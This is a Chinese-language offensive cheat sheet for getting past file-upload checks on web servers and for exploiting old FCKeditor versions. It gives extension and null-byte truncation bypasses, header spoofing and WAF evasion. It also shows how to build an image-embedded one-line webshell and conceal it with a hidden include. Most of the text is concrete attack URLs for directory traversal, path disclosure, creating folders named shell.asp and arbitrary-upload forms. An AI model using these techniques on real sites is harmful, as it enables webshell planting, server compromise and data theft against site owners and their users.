客户端防护

　　1.客户端防护用截包传

　　2、服务器端验证：

　　文件头欺骗  content-Type： application

　　改为image/jpeg或者在脚本上方加 Gif89a  首字母大写

　　3、扩展名绕过

　　1.后缀名大小写 asp asP

　　2.IIS组件  1.asa 1.cer

　　1.aspx；.jpg  1.asp；.jpg

　　3.apache组件后缀名绕过WAF php.xxx XXX不能写成Jpg，后缀写111 222

　　4.php解析  1.php3 1.php5

　　5.nginx（只用在php中）  twins.php%00jpg

　　6.ASP：1.aspx；1.jpg或者创建1.asp的文件夹，上传改后的木马1.jpg（或者在fider里面如果有topath的话尝试，直接加目录传Jpg）

　　4、00截断  绕过WAF 安全狗

　　1、改fidler     content-Length：值+1

　　filename： ma.aspx .jpg

　　改16进制文件名空格处的 20 改成 00

　　5、%00  php 版本<5.3.4 所有语言都适用

　　1.asp%00.jpg

　　aspx一般不能用%00截断

　　利用DOS命令合成一句话

　　http：//www.yunsec.net/a/security/web/jbst/2012/0830/11276.html

　　首先我们新建个文本：

　　在文本里面写入DOS命令：copy /b 1.jpg+1.txt 图片马.jpg

　　合并成功后，我们传到它网站里， 把你做好的图片替换掉原来的图片。

　　然后随便找个asp文件，插入以下代码：

　　<div style=”height=0px； width=0px； overflow=hidden”><！– #include file=image/图片.jpg –></div>

　　这个代码就是调用图片，用css定义了一个大小为0的盒子，超出这个大小的话就隐藏显示

　　比如：创建一个llsilver.asp，同级目录下保存有绑定一句话的图片（就是我们合并得到的那个图片）

　　llsilver.asp 内容是

　　<div style=”height=0px； width=0px； overflow=hidden”><！– #include file=image/图片.jpg –></div>

　　其中的【image/图片.jpg】就是llsilver.asp所在文件的文件夹image，图片.jpg就是我们合并得到的那个文件。

　　然后访问llsilver.asp这个文件的时候就等于访问一句话木马。

　　Fckeditor 漏洞

　　http：//lcx.cc/？i=1714

　　http：//www.tt001.org/thread-433-1-1.html

　　1、查看编辑器版本：

　　1./fckeditor/editor/dialog/fck_about.html

　　2./FCKeditor/_whatsnew.html

　　2. Version 2.2 版本：

　　Apache+linux 环境下在上传文件后面加个.突破！测试通过。

　　2、爆绝对路径：

　　1./FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php  (支持php的通杀)

　　2./FCKeditor/editor/filemanager/browser/default/browser.html？type=Image&connector=connectors/aspx/connector.aspx  (2.5可突破)

　　3./FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx？Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

　　3、遍历目录：

　　1./FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx？Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

　　Version 2.4.1 测试通过

　　修改 CurrentFolder 参数使用 ../../来进入不同的目录：

　　/browser/default/connectors/aspx/connector.aspx？Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

　　根据返回的XML 信息可以查看网站所有的目录。

　　FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx？Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

　　也可以直接浏览盘符：

　　JSP 版本：

　　FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector？Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

　　4、jsp上传

　　1./FCKeditor/editor/filemanager/browser/default/browser.html？Connector=connectors/jsp/connector

　　2./FCKeditor/editor/filemanager/browser/default/browser.html？Type=Image&Connector=connectors/jsp/connector.jsp

　　5、Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。

　　以下是引用片段：

　　<form id="frmUpload" enctype="multipart/form-data" action="http：//www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php？Type=Media" method="post">

　　Upload a new file：<br>

　　<input type="file" name="NewFile" size="50">

　　<br>

　　<input id="btnUpload" type="submit" value="Upload">

　　</form>

　　6、 FCKeditor 文件上传“.”变“_”下划线的绕过方法：

　　很多时候上传的文件例如：shell.php.rar 或shell.php；.jpg 会变为shell_php；.jpg 这是新版FCK 的变化。试试上传1.asp；jpg

　　6.1：提交shell.php+空格绕过：

　　不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。

　　6.2：继续上传同名文件可变为shell.php；(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

　　7、 突破建立文件夹：

　　1./FCKeditor/editor/filemanager/connectors/asp/connector.asp？Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

　　2./FCKeditor/editor/filemanager/connectors/asp/connector.asp？Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

　　3./FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp？Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

　　8、 FCKeditor 中 test 文件的上传地址：

　　1.FCKeditor/editor/filemanager/browser/default/connectors/test.html

　　2.FCKeditor/editor/filemanager/upload/test.html

　　3.FCKeditor/editor/filemanager/connectors/test.html

　　4.FCKeditor/editor/filemanager/connectors/uploadtest.html

　　7.常用上传地址

　　1.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp？Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

　　2.FCKeditor/editor/filemanager/browser/default/browser.html？type=Image&connector=connectors/asp/connector.asp

　　3.FCKeditor/editor/filemanager/browser/default/browser.html？Type=Image&Connector=http：//www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver：2.6.3 测试通过)

　　JSP 版：

　　FCKeditor/editor/filemanager/browser/default/browser.html？Type=Image&Connector=connectors/jsp/connector.jsp

　　注意红色部分修改为 FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。

　　8.其他上传地址：

　　1.FCKeditor/_samples/default.html

　　2.FCKeditor/_samples/asp/sample01.asp

　　3.FCKeditor/_samples/asp/sample02.asp

　　4.FCKeditor/_samples/asp/sample03.asp

　　5.FCKeditor/_samples/asp/sample04.asp

　　一般很多站点都已删除_samples 目录，可以试试。

　　FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

　　9.列目录漏洞也可助找上传地址：

　　Version 2.4.1 测试通过

　　修改CurrentFolder 参数使用 ../../来进入不同的目录

　　/browser/default/connectors/aspx/connector.aspx？Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

　　根据返回的XML 信息可以查看网站所有的目录。

　　FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx？Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

　　也可以直接浏览盘符：

　　JSP 版本：

　　FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector？Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

　　10.爆路径漏洞

　　FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx？Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

　　11. FCKeditor 被动限制策略所导致的过滤不严问题

　　影响版本： FCKeditor x.x <= FCKeditor v2.4.3

　　脆弱描述：

　　FCKeditor v2.4.3 中File 类别默认拒绝上传类型：

　　html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

　　Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]！

　　而在apache 下，因为"Apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件，根据FCKeditor 的代码，其限制最为狭隘。

　　在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp；.jpg

　　9、最古老的漏洞，Type文件没有限制！

　　我接触到的第一个fckeditor漏洞了。版本不详，应该很古老了，因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹，一个新类型，没有任何限制，可以上传任意脚本！

　　10、browser：

　　1.fckeditor/editor/filemanager/browser/default/browser.html？Type=File&Connector=../../connectors/asp/connector.asp

　　2.FCKeditor/editor/filemanager/browser/default/browser.html？type=Image&connector=connectors/asp/connector.asp